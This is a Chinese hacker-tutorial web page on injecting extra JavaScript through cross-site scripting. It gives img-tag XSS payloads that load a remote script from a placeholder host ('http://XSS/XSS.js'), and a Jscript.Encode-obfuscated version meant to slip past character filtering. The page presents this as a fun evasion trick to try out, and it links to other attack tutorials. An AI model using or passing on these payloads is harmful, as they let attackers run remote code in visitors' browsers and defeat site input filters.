手机
当前位置:查字典教程网 >网络安全 >黑客教程 >教你如何在XSS中再插JS
教你如何在XSS中再插JS
摘要:字符过滤怎么办?用Encode加密后就无敌了~未加密前:加密后:嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一...

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前:

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 加密后:

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

【教你如何在XSS中再插JS】相关文章:

教你如何制作VB的P-Code调试器

教你如何使用Google黑掉Windows服务器

如何多开QQ游戏大厅

教菜鸟如何手动修复引入表

全面剖析DDoS攻击 黑客常用攻击方式

教你如何用非主流方式抓鸡(图)

针对Oracle的TNS listener的攻击方法

教你数据库挂马

教你如何破别人的ASP木马密码

教你如何手工注入猜解语句

精品推荐
分类导航